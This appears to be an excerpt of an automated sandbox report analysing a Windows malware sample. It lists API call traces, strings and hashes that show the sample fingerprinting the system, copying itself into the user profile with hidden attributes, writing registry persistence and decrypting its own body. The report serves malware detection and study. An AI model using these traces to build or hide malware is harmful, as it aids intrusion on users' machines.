                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: GetVersionExA.KERNEL32(0000009C), ref: 013F8FF7
                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: GetSystemInfo.KERNEL32(?), ref: 013F9009
                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 013F902E
                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: lstrcatA.KERNEL32(00000000,_x64), ref: 013F9222
                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: lstrlenA.KERNEL32(?), ref: 013F922F
                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: lstrcatA.KERNEL32(00000000,013FC980), ref: 013F9242
                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: lstrcatA.KERNEL32(00000000,?), ref: 013F9253
                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: lstrlenA.KERNEL32(00000000), ref: 013F925D
                                                                                                                                                                                                                                                            • Part of subcall function 013F8F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 013F9275
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 013F5742
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 013F1CB1
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 013F1CE1
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: GetCurrentProcessId.KERNEL32 ref: 013F1CEE
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 013F1D52
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: lstrlenA.KERNEL32(?,000000FF,00000128), ref: 013F1D78
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 013F1D92
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 013F1DA6
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 013F1DDC
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,013F575B,00000000,?,00000004,00000000), ref: 013F1DFB
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,013F575B,00000000,?,00000004,00000000), ref: 013F1E21
                                                                                                                                                                                                                                                            • Part of subcall function 013F1CA0: CloseHandle.KERNEL32(000000FF), ref: 013F1E4B
                                                                                                                                                                                                                                                            • Part of subcall function 013F9D20: GetSystemDirectoryA.KERNEL32(?,00000103), ref: 013F9D9A
                                                                                                                                                                                                                                                            • Part of subcall function 013F9D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 013F9DDD
                                                                                                                                                                                                                                                            • Part of subcall function 013F9D20: StringFromCLSID.OLE32(00000020,?), ref: 013F9EF7
                                                                                                                                                                                                                                                            • Part of subcall function 013F5CD0: lstrlenA.KERNEL32(00000000), ref: 013F5CEB
                                                                                                                                                                                                                                                            • Part of subcall function 013F5CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013F5D10
                                                                                                                                                                                                                                                            • Part of subcall function 013F5CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 013F5D29
                                                                                                                                                                                                                                                            • Part of subcall function 013F5CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F5D45
                                                                                                                                                                                                                                                            • Part of subcall function 013F5CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 013F5D6D
                                                                                                                                                                                                                                                            • Part of subcall function 013F5CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F5D99
                                                                                                                                                                                                                                                            • Part of subcall function 013F5CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 013F5DA3
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 013F57B8
                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 013F57F1
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 013F580A
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 013F582F
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013F5854
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 013F586D
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F5896
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 013F58D0
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F5912
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 013F591C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$lstrcat$CloseVirtuallstrlen$CreateProcess$AllocChangeDirectoryFindFirstFreeHandleModuleNameNotificationProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                          • API String ID: 560841407-4090404022
                                                                                                                                                                                                                                                          • Opcode ID: ab2c2a7c79bbe46005d389c1bd4ed47c037c1626c0c77ce9fa8f649971b77519
                                                                                                                                                                                                                                                          • Instruction ID: a2279f1bdcb72896bfc0f6a9b283f54cf55aec6c6a311748966152f076496c49
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab2c2a7c79bbe46005d389c1bd4ed47c037c1626c0c77ce9fa8f649971b77519
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B151A6B1940208BBEB14DF64DC59FAE7B38AB44709F00815CF7096A2C1D774AA85CF94
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 592 13f1120-13f1134 593 13f12bb-13f12c1 592->593 594 13f113a-13f113e 592->594 594->593 595 13f1144-13f1150 lstrlenA 594->595 595->593 596 13f1156-13f1162 lstrlenA 595->596 596->593 597 13f1168-13f1175 596->597 598 13f118a-13f119b GetEnvironmentVariableA 597->598 599 13f1177-13f1188 GetAllUsersProfileDirectoryA 597->599 600 13f11a1-13f11d9 wnsprintfA lstrcmpiA 598->600 599->600 601 13f11db-13f11e1 600->601 602 13f1216-13f1287 call 13f97a0 lstrcpyA * 2 CreateThread 600->602 601->602 603 13f11e3-13f1210 CopyFileA SetFileAttributesA lstrcpyA 601->603 606 13f1289-13f128d 602->606 607 13f12a3-13f12b8 call 13f97c0 602->607 603->602 608 13f128f-13f1298 606->608 609 13f129a-13f12a1 606->609 607->593 608->609 609->593
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F1148
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F115A
                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 013F1182
                                                                                                                                                                                                                                                            • Part of subcall function 013F97C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 013F97CF
                                                                                                                                                                                                                                                            • Part of subcall function 013F97C0: HeapFree.KERNEL32(00000000), ref: 013F97D6
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 013F119B
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 013F11BD
                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000104,?), ref: 013F11D1
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000104,?,00000000), ref: 013F11F0
                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000006), ref: 013F11FF
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000104,?), ref: 013F1210
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 013F1249
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000208,00000000), ref: 013F125D
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,013F12D0,00000000,00000000,00000000), ref: 013F1274
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                          • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                          • Opcode ID: 24bff3e71086334437225ceff411baa7190e7e2f6051153eae8e2291b3f1cc17
                                                                                                                                                                                                                                                          • Instruction ID: e73c88bfcbb7accbd22c058e4b574cdb5cbf5a97e07da6cec69bbdfc346b3858
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24bff3e71086334437225ceff411baa7190e7e2f6051153eae8e2291b3f1cc17
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8411DB594020DFBDB24CFE4D889FDE7BB8AB49704F00819CEA0996284D774D685CF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 013F9A0A
                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 013F9A11
                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 013F9A3A
                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 013F9A77
                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 013F9AAD
                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?,00000000), ref: 013F9AC3
                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 013F9AE6
                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?), ref: 013F9AFC
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 013F9B7A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                          • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                          • Opcode ID: 248237614309bb691b3425968339947cdfc6c348bda201c3efc39e2b08fc440c
                                                                                                                                                                                                                                                          • Instruction ID: 385eeb1d33ca9b50ef43f630725c5a332c0ce3850ee1112ec3a4cf39b429eefe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248237614309bb691b3425968339947cdfc6c348bda201c3efc39e2b08fc440c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3141FD75A4021CABDB20CB94CC45FDAB7BDBF49704F00D1E8B64996284DB709A42CFA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(Gyifczkhyzuai,WDefault), ref: 013F5A47
                                                                                                                                                                                                                                                            • Part of subcall function 013F5930: CharUpperA.USER32(00000000), ref: 013F59E2
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(013FC4E0), ref: 013F5A7D
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,013FC4E0), ref: 013F5A97
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F5AA1
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Gyifczkhyzuai), ref: 013F5AAE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Gyifczkhyzuai), ref: 013F5AC8
                                                                                                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 013F5B00
                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 013F5B0E
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 013F5B31
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F5B3B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                          • String ID: Gyifczkhyzuai$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                          • API String ID: 4161867159-3645936388
                                                                                                                                                                                                                                                          • Opcode ID: 9d246404dca5458244fcae83ee77186c877d5621f27842b2066e417851e58801
                                                                                                                                                                                                                                                          • Instruction ID: 405392b0059cd925a9403b45297f237a8e5908f7f3ab11ebc632ed54b642b307
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d246404dca5458244fcae83ee77186c877d5621f27842b2066e417851e58801
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC316B76A4020DFBDB20DFA8DC49FAA7778AB44708F04951CFB099B284D7B0EA04CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,pigalicapi), ref: 013F5F67
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01403FE2), ref: 013F5F7A
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,013F3C58,00000000,000F003F,00000000), ref: 013F5FB3
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 013F5FF2
                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 013F603B
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 013F6045
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                          • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                          • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                          • Opcode ID: 8c1b3f3918bb9e4eb18b0eecbf9338518203bc8131dd6684fd297ce91fb31479
                                                                                                                                                                                                                                                          • Instruction ID: 95218b8361f98e4038f5792be27d62427a2f7404fa94d53023bba6001782a1f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c1b3f3918bb9e4eb18b0eecbf9338518203bc8131dd6684fd297ce91fb31479
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A23191B194021DABDB25CB91DC46FFEB778BB09704F04848CFB04A6181D7B59A45CFA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 013F40AF
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F40C6
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 013F40E6
                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 013F40F7
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 013F4101
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,013F4AC0,00000000,00000000,00000000), ref: 013F4118
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 013F41DD
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,013F4BA0,?,00000000,00000000), ref: 013F41F7
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 013F420C
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 013F4216
                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 013F42D1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 371823443-0
                                                                                                                                                                                                                                                          • Opcode ID: 21c4eabd58b48f6a7fe787f6d2fa16f34cc8ac940b5fb7cc614ef7daa5bfcb2a
                                                                                                                                                                                                                                                          • Instruction ID: 8a1958f7350a3710bcf913634de7b2bf48fb8a2b5d1a843641fe5b1a479ee86f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21c4eabd58b48f6a7fe787f6d2fa16f34cc8ac940b5fb7cc614ef7daa5bfcb2a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C851E5B5A4030DAFDB14CFA8D899FAEBBB5FB48704F104119FA05AB284D770A845CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 013F456C
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013F458B
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 013F45AD
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F45D6
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 013F4617
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 013F463E
                                                                                                                                                                                                                                                            • Part of subcall function 013F47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F482A
                                                                                                                                                                                                                                                            • Part of subcall function 013F47F0: GetLastError.KERNEL32 ref: 013F4834
                                                                                                                                                                                                                                                            • Part of subcall function 013F47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F4850
                                                                                                                                                                                                                                                            • Part of subcall function 013F47F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 013F48EB
                                                                                                                                                                                                                                                            • Part of subcall function 013F47F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 013F490B
                                                                                                                                                                                                                                                            • Part of subcall function 013F47F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 013F493C
                                                                                                                                                                                                                                                            • Part of subcall function 013F47F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 013F496F
                                                                                                                                                                                                                                                            • Part of subcall function 013F47F0: CryptDestroyKey.ADVAPI32(00000000), ref: 013F4982
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F468F
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F47C0
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 013F47E0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2585753175-0
                                                                                                                                                                                                                                                          • Opcode ID: 17650235d81f2625f39d7972f0200b53cc286578c3c4af381ceac6d3a350ce4d
                                                                                                                                                                                                                                                          • Instruction ID: b424209fd69d9ee1e1b688c6dd6c05bfe24f7aedf4079ddfbd63e083c73b1450
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17650235d81f2625f39d7972f0200b53cc286578c3c4af381ceac6d3a350ce4d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19814F749016289BDB24CF54DC94BABBBB9BF49306F0091D9E608AB2C1D774ABC5CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000103), ref: 013F9D9A
                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 013F9DDD
                                                                                                                                                                                                                                                            • Part of subcall function 013F9F70: GetAdaptersInfo.IPHLPAPI(00000000,013F9E2D), ref: 013F9FEB
                                                                                                                                                                                                                                                          • StringFromCLSID.OLE32(00000020,?), ref: 013F9EF7
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 013F9F25
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 013F9F46
                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 013F9F57
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: ad3770606a1c8d49c42f787508969c748e978ccda4a0ca977bf9248695e8b7ba
                                                                                                                                                                                                                                                          • Instruction ID: 56190c0ba792ddc715f23091881e86753a9108859c9e65ae58006c978cc25b38
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad3770606a1c8d49c42f787508969c748e978ccda4a0ca977bf9248695e8b7ba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 275128719013199FDB25CF54CC88BEABBB9AB45308F1482DDF61D6A284DB709B88CF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 013F13C6
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 013F13CD
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013F149E
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 013F14A5
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013F14EA
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 013F14F1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                          • String ID: ====
                                                                                                                                                                                                                                                          • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                          • Opcode ID: ca4ebad3c5a062844c62c4833e13c18c050bf0282362916870c10c273e9c3554
                                                                                                                                                                                                                                                          • Instruction ID: a0df3db7ba6d7d741dfe79927c05cb7f78699648bdb44867863f4d8857ec96d2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca4ebad3c5a062844c62c4833e13c18c050bf0282362916870c10c273e9c3554
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67412AB5D0020EEBCB10CFA8E844BAEBBB5FF45309F14861EE615A7381D7349A45CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 013F79A3
                                                                                                                                                                                                                                                            • Part of subcall function 013FA400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 013FA45C
                                                                                                                                                                                                                                                            • Part of subcall function 013FA400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 013FA480
                                                                                                                                                                                                                                                            • Part of subcall function 013FA400: RegCloseKey.KERNEL32(00000000), ref: 013FA494
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F7AE3
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F8AD3
